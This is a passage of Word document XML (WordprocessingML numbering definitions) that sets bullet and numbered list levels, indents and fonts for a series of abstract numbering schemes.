        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="42CAAC62">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9C7CE806">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B596C63E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="DA18504C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="50" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="347F1DD9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="199E4886">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="8DAEF65A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7C3EBB98">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6E30BE02">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="DD06BBDC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7C0C47A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F80EE908">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5D24841A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4C084516">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="51" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="34FE4589"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B372A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529180B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B504EE6"/>
    <w:lvl w:ilvl="0" w:tplc="3FE8FC90">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A5DA1F48">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="79CCF13A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CBF61C34">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="58BE0206">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="DF6CEAE0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="20AE3928">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="108C3F82">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B2DE79B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="53" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="355673F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="48C6502A"/>
    <w:lvl w:ilvl="0" w:tplc="80F4AEA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9B9E870A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="17BCF00E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="EBB06D5C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CB04D564">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D95C263C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5966142C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3A60F9AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C8A0515C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="54" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="357D329F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50EE55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7F73C5E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="22989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96B7F64"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43602A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9D55154"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D2A0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A725DBB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC20F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BC94C96"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10140BAA"/>
    <w:lvl w:ilvl="0" w:tplc="0427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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3C7B786C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B372A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3D564E47"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="308A66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DEC3F17"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="199E4886">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="8DAEF65A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7C3EBB98">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="6E30BE02">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="DD06BBDC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7C0C47A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F80EE908">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5D24841A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4C084516">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="63" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3EB61C7E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="7966B01C">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B07E3EBE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7D303FE6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CC427434">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="52CA9952">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4A006F5A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="45C61068">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EA9E303E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0B869944">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="64" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3EC1288B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="3CD64CEE">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A07C3490">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D1B0EDC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="321CAB44">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CB8C698C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7F94C148">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="80BC110C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5CBAC8BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C80E7910">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="65" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3EC31092"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="38B4DDBC">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="17F4291C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8B085056">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5B0C6242">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0B6216FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C67AC97A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FB046586">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="52DE6DDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C86C5B82">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="66" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="40B94BAF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57B09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1D30ABF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="479E07C6"/>
    <w:lvl w:ilvl="0" w:tplc="B284FC88">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D30CF90A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7C08CED0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A1F6D5EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7DA0F44E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="FC8081DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="53123AB6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DC16E6D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2E2C96BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="68" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="42091E39"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C77C8DCE"/>
    <w:lvl w:ilvl="0" w:tplc="824047EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C04E1ECC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D58AA884">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="8056DF72">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="AEF459C0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A40E578E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4094CB64">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="37C01AF4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="84D441BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="69" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="427A0877"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="622C8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2916FB0"/>
